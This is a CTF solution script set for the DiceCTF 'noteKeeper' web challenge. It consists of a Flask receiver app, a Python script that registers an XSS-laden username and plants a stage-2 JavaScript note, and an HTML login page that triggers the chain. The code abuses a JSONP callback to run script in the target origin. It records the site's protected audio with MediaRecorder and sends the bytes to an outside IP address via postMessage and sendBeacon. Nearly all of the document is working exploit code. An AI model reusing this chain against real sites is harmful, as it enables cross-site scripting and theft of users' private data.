noteKeeper solution dicectf
from flask import Flask
# Receiver application: the exploit script's ``endpoint_url`` points at the
# host running this file (see its "this runs app.py" comment).
app = Flask(__name__)
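@app.route("/")
def main():
    """Serve the receiver page.

    The page installs a ``message`` handler: every string it receives is
    turned into one request to ``/dump/<data>`` (handled by ``test`` below),
    which is how posted chunks reach the file-writing route.

    Returns:
        The HTML page as a string.
    """
    # ``e.data`` ends up in a URL path segment, so it is type-checked and
    # percent-encoded before use; concatenating it raw (as before) let a
    # ``?`` or ``#`` in a message truncate the request.
    # NOTE(review): there is still no ``e.origin`` check -- any document that
    # can obtain a reference to this window can trigger a write.
    return """\
<script>
onmessage = e => {
  if (typeof e.data !== "string") return;
  const ifr = document.createElement("iframe");
  ifr.src = "/dump/" + encodeURIComponent(e.data);
  document.body.append(ifr);
}
</script>
"""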
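@app.route("/dump/<info>")
def test(info):
    """Store one posted chunk as ``<name>.txt`` in the working directory.

    ``info`` has the form ``<name>:<payload>``; the receiver page (``main``)
    relays messages shaped ``<offset>:<comma-separated byte values>``, so
    ``name`` is normally a decimal offset. Because ``name`` comes straight
    from the URL and becomes a filename, it is restricted to ASCII letters
    and digits; anything else, or a missing ``:``, is answered with 400 and
    nothing is written (the original raised IndexError -> 500 on a missing
    separator and used the name unchecked).

    Args:
        info: the URL path segment after ``/dump/``.

    Returns:
        ``"xd"`` on success, or ``("bad request", 400)`` when rejected.
    """
    name, sep, body = info.partition(":")
    if not sep or not (name.isascii() and name.isalnum()):
        return "bad request", 400
    # Everything after the first ``:`` is the payload; the original's
    # ``split(":")[1]`` silently dropped anything past a second colon.
    with open(f"{name}.txt", "w", encoding="utf-8") as f:
        f.write(body)
    return "xd"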
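if __name__ == "__main__":
    # Guarded so the module can be imported (e.g. by a test) without
    # starting the server. Binding to all interfaces is deliberate: the
    # exploit script's ``endpoint_url`` must reach this host from outside.
    app.run(host="0.0.0.0")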
import requests
from urllib import parse
import secrets
#url = "http://localhost"
# Target site, and the address of the receiver (the Flask app.py above).
url = "https://notekeeper.mc.ax"
endpoint_url = "http://104.248.133.199:5000/" # this runs app.py
# Random suffix appended to the username so every run registers a fresh
# account.
token: str = secrets.token_hex()
# Stage 1 -- the username. It carries an <iframe srcdoc> that loads the
# target's notes-list endpoint with ``callback=parent.opener.setTimeout``.
# Presumably a JSONP-style endpoint that echoes the callback name
# unvalidated, so the response calls setTimeout with the stored note
# (stage 2) as its string argument -- cannot be confirmed from here.
# ``parent.opener`` is the window that opened the login popup; the HTML
# page below navigates that window to ``/script.js``.
payload: str = f"""\
<iframe srcdoc="<script src='/api/notes/list?callback=parent.opener.setTimeout'></script>"></iframe>\
""" + token
payload = parse.quote(payload)
# Stage 2 -- the note body, JavaScript that runs in the target's origin.
# It opens a new window and eval()s code there which, after 5 s, points the
# opener at ``{url}/script.js`` and document.write()s ``recording_code``
# into it. That page, once ``#logout`` is clicked, plays
# ``/api/audio/file?`` through an AudioContext, records the stream with
# MediaRecorder for 10 s, opens ``endpoint_url`` and postMessage()s the
# recorded bytes 1000 at a time as ``<offset>:<comma-separated bytes>``
# (the format app.py's ``/dump/<info>`` route stores), with a wildcard
# target origin. Exceptions are reported to ``endpoint_url`` via
# sendBeacon. Braces are doubled throughout because this is an f-string.
stage2: str = f"""\
w = window.open()
recording_code = `
<button id=logout></button>
<script>
async function sleep(ms) {{
return new Promise(resolve=>setTimeout(resolve, ms));
}}
logout.onclick = async e => {{
try {{
a = new Audio("{url}/api/audio/file?");
await sleep(100);
const ac = new AudioContext();
const source = ac.createMediaElementSource(a);
const dest = ac.createMediaStreamDestination();
source.connect(dest);
const recorder = new MediaRecorder(dest.stream);
recorder.start();
a.play();
recorder.ondataavailable = ev => {{
console.log(ev.data);
ev.data.arrayBuffer().then(async buf =>{{
arr = new Uint8Array(buf);
w2= window.open("{endpoint_url}");
await sleep(500);
console.log(w2);
for (let i=0; i<arr.length; i += 1000) {{
data = i + ":" + new Uint8Array(arr.subarray(i, i+1000)).toString();
console.log(data);
w2.postMessage(data, "*");
}}
}})
}};
await sleep(10000);
recorder.stop();
}} catch (ex) {{
console.log(ex);
navigator.sendBeacon("{endpoint_url}" + ex);
}}
}}
</script>
`
w.eval(`
async function sleep(ms) {{
return new Promise(resolve=>setTimeout(resolve, ms));
}}
(async () =>{{
await sleep(5000);
opener.location = "{url}/script.js"
script_content = atob("${{btoa(recording_code)}}");
console.log(script_content);
await sleep(500);
opener.document.write(script_content);
}})()
`)
"""
password: str = "asdasd"
# Printed so the values can be pasted into the HTML login page below.
print(f"username: {payload}")
print(f"password: {password}")
# Register the crafted username, then store stage 2 as that account's note.
sess = requests.session()
# The body is built by hand so ``username`` appears twice
# (``username=...&username``); the second, empty value is presumably needed
# by the target's form handling -- it mirrors the duplicated inputs in the
# HTML page below. ``r1`` is not checked.
r1 = sess.post(url + "/api/register", headers={
"Content-Type": "application/x-www-form-urlencoded"
}, data = f"username={payload}&username&password={password}")
r2 = sess.post(url + "/api/notes/add", headers={
"Content-Type": "application/x-www-form-urlencoded"
}, data={"note": stage2})
print(r2.status_code)
<!-- Login page that starts the chain: it posts the crafted username (the
     same iframe payload the Python script registered, token included) to
     /api/login in a new tab, then navigates this page to /script.js so it
     serves as the popup's `opener`. -->
<form id=testform method="post">
<!-- `username` is repeated on purpose; the script fills only the first
     input and leaves the second empty, matching the
     "username=...&username" body the Python script sends. -->
<input name=username value=""/>
<input name=username value="">
<input name="password" value="">
</form>
<script>
//url = "http://localhost";
url = "https://notekeeper.mc.ax"
testform.action = url + "/api/login";
// Two inputs share the name, so testform.username is a collection; [0]
// is the first one.
testform.username[0].value = decodeURIComponent("%3Ciframe%20srcdoc%3D%22%3Cscript%20src%3D%27/api/notes/list%3Fcallback%3Dparent.opener.setTimeout%27%3E%3C/script%3E%22%3E%3C/iframe%3Ebb569ca119e8dc25933b390a06a615adbad2d8304ad176f5ae98948c5d315aea");
testform.password.value = "asdasd";
// Submit into a new tab first, then move this window to /script.js; the
// order matters because the popup's `opener` (this window) is presumably
// what the `parent.opener.setTimeout` callback and the stage-2 script's
// `opener.location` refer to.
testform.target = "_blank";
testform.submit();
location = url + "/script.js";
</script>